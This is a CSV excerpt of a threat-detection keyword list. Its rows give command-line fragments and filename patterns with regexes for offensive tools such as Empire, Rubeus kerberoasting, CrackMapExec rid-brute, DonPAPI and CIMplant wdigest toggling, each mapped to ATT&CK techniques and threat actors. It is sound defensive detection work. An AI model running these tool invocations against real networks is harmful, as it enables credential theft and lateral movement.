"* -Rhosts * -Path *.txt -Port *",".{0,1000}\s\-Rhosts\s.{0,1000}\s\-Path\s.{0,1000}\.txt\s\-Port\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Find-Fruit.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2897"
"* riak-http-info.nse*",".{0,1000}\sriak\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2898"
"* rid_hijack.py*",".{0,1000}\srid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","2899"
"* --rid-brute *",".{0,1000}\s\-\-rid\-brute\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2900"
"* --rid-brute 2>&1 *.txt*",".{0,1000}\s\-\-rid\-brute\s2\>\&1\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","2901"
"* --rid-brute*",".{0,1000}\s\-\-rid\-brute.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2902"
"* rid-hijack -*",".{0,1000}\srid\-hijack\s\-.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","2903"
"* -rl 4 -ta 8 -t 2100 -an AS8560*",".{0,1000}\s\-rl\s4\s\-ta\s8\s\-t\s2100\s\-an\sAS8560.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","2904"
"* rlogin-brute.nse*",".{0,1000}\srlogin\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2905"
"* --rm -it nachovpn*",".{0,1000}\s\-\-rm\s\-it\snachovpn.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","2906"
"* --rm -it --name gsocket*",".{0,1000}\s\-\-rm\s\-it\s\-\-name\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","2907"
"* rm_injection.exe*",".{0,1000}\srm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2908"
"* rmi-dumpregistry.nse*",".{0,1000}\srmi\-dumpregistry\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2909"
"* rmi-vuln-classloader.nse*",".{0,1000}\srmi\-vuln\-classloader\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2910"
"* roaster.py*",".{0,1000}\sroaster\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","2912"
"* rockyou.txt *",".{0,1000}\srockyou\.txt\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2913"
"* RogueOxidResolver must be run remotely*",".{0,1000}\sRogueOxidResolver\smust\sbe\srun\sremotely.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","2914"
"* --rogue-smbserver-ip *",".{0,1000}\s\-\-rogue\-smbserver\-ip\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","2915"
"* --rogue-smbserver-share *",".{0,1000}\s\-\-rogue\-smbserver\-share\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","2916"
"* ropbuffers.go*",".{0,1000}\sropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","2917"
"* ropfuscator*",".{0,1000}\sropfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","2918"
"* rotateproxy *",".{0,1000}\srotateproxy\s.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","2919"
"* rotateproxy.service*",".{0,1000}\srotateproxy\.service.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","2920"
"* rpcap-brute.nse*",".{0,1000}\srpcap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2921"
"* rpcap-info.nse*",".{0,1000}\srpcap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2922"
"* rpcdump.py*",".{0,1000}\srpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","2924"
"* rpc-grind.nse*",".{0,1000}\srpc\-grind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2925"
"* rpcinfo.nse*",".{0,1000}\srpcinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2926"
"* rsa-vuln-roca.nse*",".{0,1000}\srsa\-vuln\-roca\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2930"
"* rsync-brute.nse*",".{0,1000}\srsync\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2934"
"* rsync-list-modules.nse*",".{0,1000}\srsync\-list\-modules\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2935"
"* rt_hijacking.exe*",".{0,1000}\srt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2936"
"* rtsp-methods.nse*",".{0,1000}\srtsp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2937"
"* rtsp-url-brute.nse*",".{0,1000}\srtsp\-url\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2938"
"* -Rubeus -Command *kerberoast*",".{0,1000}\s\-Rubeus\s\-Command\s.{0,1000}kerberoast.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","2941"
"* Rubeus.dll*",".{0,1000}\sRubeus\.dll.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","2942"
"* Rubeus.ps1*",".{0,1000}\sRubeus\.ps1.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","N/A","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","2943"
"* ruler.exe*",".{0,1000}\sruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","2944"
"* --rules:Jumbo *",".{0,1000}\s\-\-rules\:Jumbo\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","2945"
"* run donpapi*",".{0,1000}\srun\sdonpapi.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","2946"
"* run netexec *",".{0,1000}\srun\snetexec\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2947"
"* run nxc smb *",".{0,1000}\srun\snxc\ssmb\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2948"
"* RunasCs.cs*",".{0,1000}\sRunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","2949"
"* -runaslsass*",".{0,1000}\s\-runaslsass.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","2950"
"* rusers.nse*",".{0,1000}\srusers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2951"
"* rustbof *",".{0,1000}\srustbof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","0","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","2952"
"* rusthound.exe*",".{0,1000}\srusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","2954"
"* rwf.py *",".{0,1000}\srwf\.py\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","2955"
"* -s * -c command_exec --execute *",".{0,1000}\s\-s\s.{0,1000}\s\-c\scommand_exec\s\-\-execute\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2956"
"* -s * -c disable_wdigest *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sdisable_wdigest\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2957"
"* -s * -c disable_winrm *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sdisable_winrm\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2958"
"* -s * -c enable_wdigest *",".{0,1000}\s\-s\s.{0,1000}\s\-c\senable_wdigest\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2959"
"* -s * -c enable_winrm *",".{0,1000}\s\-s\s.{0,1000}\s\-c\senable_winrm\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2960"
"* -s * -c remote_posh *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sremote_posh\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","2961"
